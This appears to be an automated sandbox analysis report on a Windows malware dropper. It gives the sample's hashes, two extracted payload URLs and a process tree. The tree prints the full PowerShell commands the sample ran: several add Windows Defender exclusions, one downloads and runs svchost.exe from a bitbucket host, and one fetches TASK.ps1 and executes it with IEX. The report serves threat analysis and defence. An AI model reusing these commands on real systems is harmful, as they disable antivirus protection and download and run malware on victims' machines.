Analysis
-
max time kernel
78s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 18:52
Static task
static1
Behavioral task
behavioral1
Sample
ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe
Resource
win10v2004-20240910-en
General
-
Target
ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe
-
Size
147KB
-
MD5
ee38e40d13cfee4d0fb24624c152fb48
-
SHA1
55d903926d63c0a2db44774d15b137af2b4483be
-
SHA256
242fd2d6c72a0a3cfe8f767465e30d94d70e2d094277ad3d6be99336af625480
-
SHA512
8b8d85f2335b2d3b247226583a4f7a717b65cb740c4fbe9fce093b15b23c43da1d1271943d8c48bf567cea806735f91e89928b8cd9f5abbf6d84626e83fbe8f1
-
SSDEEP
3072:5jFRQGCIIm1xs5GWp1icKAArDZz4N9GhbkrNEk1AgZ:dQGCIImOp0yN90QEE
Malware Config
Extracted
https://bitbucket.org/dazlle/logos/downloads/svchost.exe
Extracted
https://bitbucket.org/dazlle/logos/downloads/TASK.ps1
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2788 powershell.exe 6 2788 powershell.exe 8 944 powershell.exe 9 944 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2704 powershell.exe 2732 powershell.exe 2780 powershell.exe 2740 powershell.exe 2788 powershell.exe 944 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org 8 bitbucket.org 9 bitbucket.org -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2704 powershell.exe 2732 powershell.exe 2780 powershell.exe 2740 powershell.exe 2788 powershell.exe 944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2780 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 944 powershell.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 2532 wrote to memory of 1468 2532 ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe 30 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2704 1468 cmd.exe 32 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2732 1468 cmd.exe 33 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2780 1468 cmd.exe 34 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2740 1468 cmd.exe 35 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 1468 wrote to memory of 2788 1468 cmd.exe 36 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 2788 wrote to memory of 2344 2788 powershell.exe 37 PID 1468 wrote to memory of 944 1468 cmd.exe 38 PID 1468 wrote to memory of 944 1468 cmd.exe 38 PID 1468 wrote to memory of 944 1468 cmd.exe 38 PID 1468 wrote to memory of 944 1468 cmd.exe 38 PID 1468 wrote to memory of 944 1468 cmd.exe 38 PID 1468 wrote to memory of 944 1468 cmd.exe 38 PID 1468 wrote to memory of 944 1468 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\ee38e40d13cfee4d0fb24624c152fb48_JaffaCakes118.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2532 -
C:\Windows\SysWOW64\cmd.execmd.exe /c test10.bat2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\Temp"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension ".reg"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/dazlle/logos/downloads/svchost.exe','C:\Users\Admin\AppData\Local\Temp\svchost.exe'); cmd /c 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost.exe4⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
-
C:\wiNDowS\SysWOW64\windowsPowerShell\v1.0\powershell.exeC:\wiNDowS\System32\windowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $wcli = ((New-Object System.Net.WebClient)).DownloadString('https://bitbucket.org/dazlle/logos/downloads/TASK.ps1');IEX $wcli3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5538dc74b9937f71bf6e20cf5cda70cd4
SHA1258839f75b2eb0978e7566e123557d710d9b264a
SHA2561c8c62d29c1f9f3ed790caa38cc693b6d94a75dac037fc857211028d85942b70
SHA51295d7fd78aa93986c0909e27ead1fc8cfb6a7bccd3f33221f67ae2039966fee6531e3e6dc0d2f795dc46525f279d5d975ee12452e77eb85d52ee20e0b5fa35c23
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5fad196647bc831b8f74510d602689fd3
SHA1a121ad247da28cea5316c307ce5cd4bccb35ad3b
SHA256f6919a4200f4d6640b423326617425c13a1acbd617a18f9747fee7d1a258aa36
SHA5124ee9dc83b3ad822b6c6d2f23beaed4d1a5556027f9612b161f7c1b9ea778aec67110b5e5926a739ee7c9692ddea9c0cd17ccc0dfd524e1e77e5ccef2ebe6c631